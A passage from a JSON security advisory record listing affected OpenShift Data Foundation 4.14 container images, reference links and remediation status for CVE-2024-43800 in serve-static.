"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
